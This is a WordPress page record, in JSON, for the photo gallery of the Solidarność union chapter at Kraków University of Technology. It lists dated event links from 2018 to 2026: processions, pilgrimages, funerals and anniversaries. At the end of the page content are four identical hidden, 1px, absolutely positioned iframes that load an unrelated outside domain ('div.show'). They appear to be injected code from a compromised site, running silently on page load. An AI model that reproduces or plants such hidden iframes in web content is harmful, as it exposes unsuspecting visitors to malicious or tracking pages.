{"id":375,"date":"2018-05-23T11:35:41","date_gmt":"2018-05-23T09:35:41","guid":{"rendered":"http:\/\/solidarnosc.pk.edu.pl\/?page_id=375"},"modified":"2026-05-14T08:59:15","modified_gmt":"2026-05-14T06:59:15","slug":"galeria","status":"publish","type":"page","link":"https:\/\/solidarnosc.pk.edu.pl\/?page_id=375","title":{"rendered":"GALERIA"},"content":{"rendered":"<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=5298\" target=\"_blank\" rel=\"noopener\">10.05.2026r. &#8211; Procesja \u015bw. Stanis\u0142awa BM na Ska\u0142k\u0119<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=5224\">1.05.2026 &#8211;&nbsp; XX Wiosenny Spacer G\u00f3rski \u015aladami \u015bw. Jana Paw\u0142a Wielkiego<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/index.php\/nggallery\/page\/3?p=5003\" target=\"_blank\" rel=\"noopener\">2.10.2025r. &#8211; 2.10.2025r. \u2013 Uroczysta Inauguracja Roku Akademickiego na Politechnice Krakowskiej<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4834\">8.08.2025r. &#8211; Pogrzeb Ewy Janiny Sadowskiej<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?page_id=4666\" target=\"_blank\" rel=\"noopener\">17.01.2025r. &#8211; Pogrzeb Marii i Jana Bruzda<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4473\" target=\"_blank\" rel=\"noopener\">13.01.2025r. &#8211;<\/a> <a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4473\" target=\"_blank\" rel=\"noopener\">Senat z okazji 80-lecia Politechniki Krakowskiej<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4330\" target=\"_blank\" rel=\"noopener\">13.12.2024r. &#8211; 43 rocznica wprowadzenia stanu wojennego<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4290\">10.12.2024r. Op\u0142atek&nbsp; NSZZ Solidarno\u015b\u0107 PK dla emeryt\u00f3w<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=4020\" target=\"_blank\" rel=\"noopener\">3.10.2024r. &#8211; 80 uroczysta Inauguracja Roku Akademickiego na Politechnice Krakowskiej<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=3933\" target=\"_blank\" rel=\"noopener\">31.07.2024r.- 44 rocznica porozumie\u0144 sierpniowych<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=3888\" target=\"_blank\" rel=\"noopener\">3.06.2024r. &#8211; Dzie\u0144 Dziecka na Politechnice Krakowskiej<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?page_id=3710\" target=\"_blank\" rel=\"noopener\">12.05.2024r. &#8211; Procesja na Ska\u0142k\u0119<\/a><\/p>\r\n<p><!-- \/wp:post-content -->\r\n\r\n<!-- wp:paragraph --><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=3678\" target=\"_blank\" rel=\"noreferrer noopener\">10.05.2024r. &#8211; protest przeciw Zielonemu \u0141adowi<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?page_id=3710\" target=\"_blank\" rel=\"noopener\">1.05.2024r. &#8211; XVIII Spacer \u015bladami Jana Paw\u0142a II<\/a><\/p>\r\n<p><!-- \/wp:paragraph --><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?page_id=3625\" target=\"_blank\" rel=\"noopener\">22.03.2024r. &#8211; Pogrzeb Dr in\u017c. Janusza Zaj\u0119ckiego<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?page_id=3617\" target=\"_blank\" rel=\"noopener\">22.03.2024r. &#8211; I rocznica \u015bmierci Rektora PK, prof. dr hab. in\u017c arch. Andrzeja Bia\u0142kiewicza<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=3464\" target=\"_blank\" rel=\"noopener\">14.12.2023r. &#8211; Spotkanie op\u0142atkowe<\/a><\/p>\r\n<p><a href=\"https:\/\/solidarnosc.pk.edu.pl\/?p=3380\" target=\"_blank\" rel=\"noopener\">13.12.2023r. &#8211; Obchody 42 rocznicy wprowadzenia stanu wojennego<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?p=3242\">17.09.2023r. &#8211; 41 Pielgrzymka Ludzi Pracy na Jasn\u0105 G\u00f3r\u0119<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?p=3188\">31.08.2023r. &#8211; Obchody 43. rocznicy podpisania Porozumie\u0144 Sierpniowych<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?p=2805\">29.03.2023r. &#8211; pogrzeb JM Rektora PK Andrzeja Bia\u0142kiewicza<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2569\" target=\"_blank\" rel=\"noopener\">14.03.2023r. &#8211; Walne zebranie delegat\u00f3w NSZZ Solidarno\u015b\u0107 Politechniki Krakowskiej<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2538\">10.03.2023r. &#8211; Pogrzeb Prof. Zenona Waszczyszyna<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2393\" target=\"_blank\" rel=\"noopener\">3.01.2023r. &#8211; Pogrzeb Prof. El\u017cbiety W\u0119c\u0142awowicz-Bilskiej<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?p=2286\" target=\"_blank\" rel=\"noopener\">13.12.2022r. 41 rocznica wprowadzenia Stanu Wojennego w Polsce &#8211; obchody w Krakowie.<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2258\" target=\"_blank\" rel=\"noopener\">13.12.2022r. &#8211; spotkanie op\u0142atkowe NSZZ Solidarno\u015b\u0107 PK<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2201\" target=\"_blank\" rel=\"noopener\">6.10-2022r. &#8211; Inauguracja Roku Akademickiego na Politechnice Krakowskiej.<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2136\" target=\"_blank\" rel=\"noopener\">31.08.2022r. &#8211; 42 rocznica podpisania Porozumie\u0144 Sierpniowych<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=2039\" target=\"_blank\" rel=\"noopener\">8.05.2022r. &#8211; Pielgrzymka z Wawelu na Ska\u0142k\u0119<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1989\" target=\"_blank\" rel=\"noopener\">1.05.2022r. &#8211; XVI Pierwszomajowy spacer \u015bladami \u015aw. JPII<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1821\" target=\"_blank\" rel=\"noopener\">13.12.2021r. &#8211; 40-ta rocznica stanu wojennego<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1684\" target=\"_blank\" rel=\"noopener\">31.08.2021r. &#8211; Rocznica porozumie\u0144 sierpniowych 2021<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1598\" target=\"_blank\" rel=\"noopener\">14.05.2021r. &#8211; pogrzeb El\u017cbiety D\u0105mbskiej-\u015amia\u0142owskiej<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1582\" target=\"_blank\" rel=\"noopener\">16.04.2021r. &#8211; pogrzeb Bronis\u0142awa Zaj\u0105czkowskiego<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1339\">25.02.2021r. &#8211; Pogrzeb \u015aw. P. Mieczys\u0142awa Pieronka<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1220\" target=\"_blank\" rel=\"noopener noreferrer\">31.08.2020r. &#8211; 40-ta rocznica podpisania Porozumie\u0144 Sierpniowych<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/index.php\/38-rocznica-stanu-wojennego-2019-krakow\/\" target=\"_blank\" rel=\"noopener noreferrer\">13.12.2019 r. &#8211; 38 rocznica wprowadzenia stanu wojennego<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=1088\" target=\"_blank\" rel=\"noopener noreferrer\">3.10.2019 r. &#8211; 75 Inauguracja Roku Akademickiego 2019\/2020 na Politechnice Krakowskiej<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=978\" target=\"_blank\" rel=\"noopener noreferrer\">15.09.2019 r. &#8211; XXXVII Pielgrzymka Ludzi Pracy &#8211; Cz\u0119stochowa<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=883\">12.05.2019 r. &#8211; Procesja na Ska\u0142k\u0119 ku czci \u015bw. Stanis\u0142awa<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=863\" target=\"_blank\" rel=\"noopener noreferrer\">01.05.2019 r. &#8211; XV wiosenny spacer g\u00f3rski \u015aladami \u015aw. Jana Paw\u0142a II 2019<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=718\">13.12.2018 r. &#8211;&nbsp; uroczysta Msza \u015aw. rocznicowa na Wawelu z okazji 37 rocznicy wprowadzenia stanu wojennego.<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=687\">13.12.2018 r. &#8211; Spotkanie op\u0142atkowe NSZZ Solidarno\u015b\u0107 PK w Galerii GIL.<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=652\">16.09.2018r. &#8211; XXXVI Pielgrzymka \u015awiata Pracy<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=655\">31.08.2018r. &#8211; 38 rocznica urodzin Solidarno\u015bci &#8211; Krak\u00f3w WAWEL.<\/a><\/p>\r\n<p><a href=\"http:\/\/solidarnosc.pk.edu.pl\/?page_id=658\">13.05.2018r. &#8211; Procesja na Ska\u0142k\u0119<\/a><\/p>\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;<\/p>\r\n<!-- \/wp:paragraph -->\r\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\r\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\r\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\r\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>10.05.2026r. &#8211; Procesja \u015bw. Stanis\u0142awa BM na Ska\u0142k\u0119 1.05.2026 &#8211;&nbsp; XX Wiosenny Spacer G\u00f3rski \u015aladami &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"_mc_calendar":[],"footnotes":""},"class_list":["post-375","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=375"}],"version-history":[{"count":103,"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/375\/revisions"}],"predecessor-version":[{"id":5313,"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=\/wp\/v2\/pages\/375\/revisions\/5313"}],"wp:attachment":[{"href":"https:\/\/solidarnosc.pk.edu.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}